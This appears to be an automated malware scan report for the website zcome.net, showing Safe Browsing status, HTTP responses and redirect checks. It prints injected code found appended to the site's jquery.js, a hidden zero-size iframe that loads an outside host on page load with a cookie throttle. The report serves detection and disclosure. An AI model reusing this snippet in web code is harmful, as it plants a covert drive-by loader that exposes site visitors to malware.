Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zcome.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.zcome.net/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=1 Connection: close Date: Sun, 05 Oct 2014 08:38:32 GMT Location: http://zcome.net/ Server: nginx Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Sun, 05 Oct 2014 08:38:08 GMT X-Pingback: http://zcome.net/xmlrpc.php | clean |
http://zcome.net/ | 200 OK Content-Length: 65701 Content-Type: text/html | clean |
http://zcome.net/wp-includes/js/jquery/jquery.js?ver=1.4.2 | 200 OK Content-Length: 72667 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3379 bytes skipped]... &&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window);jQuery.noConflict(); ;var if8y06Y7 = document.createElement('iframe');if8y06Y7.name = 'if8y06Y7';if8y06Y7.src = 'http://asurt.toutges.com/';if8y06Y7.style.width = '0px';if8y06Y7.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if8y06Y7=') == -1) { document.getElementsByTagName('body')[0].appendChild(if8y06Y7);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); document.cookie = 'if8y06Y7=yes; path=/; expires=' + expiresDate;}}; Antivirus reports:
| ||
http://zcome.net/wp-content/themes/chocotheme/js/fn.js | 200 OK Content-Length: 989 Content-Type: application/javascript | clean |
http://www.zcome.net/test404page.js | 404 Not Found Content-Length: 483 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zcome.net
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=1
Connection: close
Date: Sun, 05 Oct 2014 08:38:32 GMT
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Sun, 05 Oct 2014 08:38:08 GMT
X-Pingback: http://zcome.net/xmlrpc.php
GET / HTTP/1.1
Host: zcome.net
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=1
Connection: close
Date: Sun, 05 Oct 2014 08:38:32 GMT
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Sun, 05 Oct 2014 08:38:08 GMT
X-Pingback: http://zcome.net/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: zcome.net
Referer: http://www.google.com/search?q=zcome.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zcome.net
Referer: http://www.google.com/search?q=zcome.net
Result:
The result is similar to the first query. There are no suspicious redirects found.